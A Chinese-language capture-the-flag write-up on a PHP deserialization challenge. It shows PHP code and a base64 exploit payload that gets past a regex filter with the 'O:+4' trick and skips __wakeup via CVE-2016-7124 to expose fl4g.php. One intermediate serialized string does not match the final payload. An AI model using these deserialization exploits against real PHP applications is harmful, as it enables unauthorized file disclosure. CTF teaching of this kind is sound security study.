题目
题目如下
可以看出来这是一道关于反序列化的题目
分析题目
看一下题目的代码
- 首先判断GET参数 “var” 是否存在,然后通过base64解码传入变量var,如果不存在就输出网页源码
- 对var进行一个正则过滤,如果通过正则过滤便会进行反序列化,否则响应信息’stop hacking!’
题目中出现的魔术方法
题目中存在一个demo类
__contrust()
见名知意,构造方法。具有构造方法的类会在每次创建新对象前调用此方法 ,该方法常用于完成一些初始化工作。__destruct()
析构方法 ,当 某个对象的所有引用都被删除或者当对象被显式销毁时 , 析构函数会被执行。__wakeup()
是用在反序列化操作中。unserialize() 会检查存在一个 __wakeup() 方法。如果存在,则先会调用 __wakeup() 方法。 __wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。
解题思路
- 通过GET传入base64编码得参数且要绕过正则过滤
- 绕过 __wakeup()
解释,源码中提示flag在 fl4g.php 中,而使用调用 __wakeup() 会强制将 $file 变量复制为index.php
开始解题
序列化
代码如下
<?php
class Demo { private $file = 'index.php';public function __construct($file) { $this->file = $file; }function __destruct() { echo @highlight_file($this->file, true); }function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php$this->file = 'index.php'; } }
}$a = new Demo('fl4g.php');
$b = serialize($a);
echo $b;
?>
运行后结果如下
O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
绕过正则
该题正则匹配的规则如下:
在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 , 那么就被过滤。
我们传入得参数类型为对象 " O " , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 " O:4 " 这样的字符串肯定无法通过正则匹配
这里利用了一个php反序列化的特性(感兴趣可以自行百度),需要注意的是在php7中这部分代码被修改了,无法使用。
获取php版本
使用dirsearch进行扫描
可以找到泄露的PHP信息
利用特性
反序列化操作 参数格式:参数名长度 时,当格式为 参数格式:+参数名长度 会返回同样的结果,故我们可以通过这个方法绕过正则过滤
O:+4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
绕过__wakeup()
对应的CVE编号: CVE-2016-7124
- 存在漏洞的PHP版本: PHP5.6.25 之前版本和 7.0.10 之前的7.x版本
- 漏洞概述: __wakeup() 魔法函数被绕过,导致执行了一些非预期效果的漏洞
- 漏洞原理: 当对象的 属性(变量)数 大于实际的个数时, __wakeup() 魔法函数被绕过
故序列化结果修改如下
O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
构造payload
题目中知道还需要进行base64编码
构造payload如下
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
得到flag
注意点
需要注意的一点是private和protect属性的序列化
直接上代码
<?phpclass test{public $name="winny";private $age="8";protected $sex="female";}$a=new test();$a=serialize($a);print_r($a);
?>
序列化显示如下
O:4:"test":3:{s:4:"name";s:5:"winny";s:9:"testage";s:1:"8";s:6:"*sex";s:6:"female";}
-
private分析:
这样就发现本来是age结果上面出现的是testage,而且testage长度为7,但是上面显示的是9
查找资料后发现private属性序列化的时候格式是 %00类名%00成员名,%00 占一个字节长度,所以age加了类名后变成了testage长度为9 -
protect分析:
本来是sex结果上面出现的是*sex,而且*sex的长度是4,但是上面显示的是6,同样查找资料后发现protect属性序列化的时候格式是 %00*%00成员名
public(公共的):在本类内部、外部类、子类都可以访问
protect(受保护的):只有本类或子类或父类中可以访问
private(私人的):只有本类内部可以使用
这里我开始是采用手动序列化,一直没有成功。本菜狗还是使用脚本输出吧呜呜呜。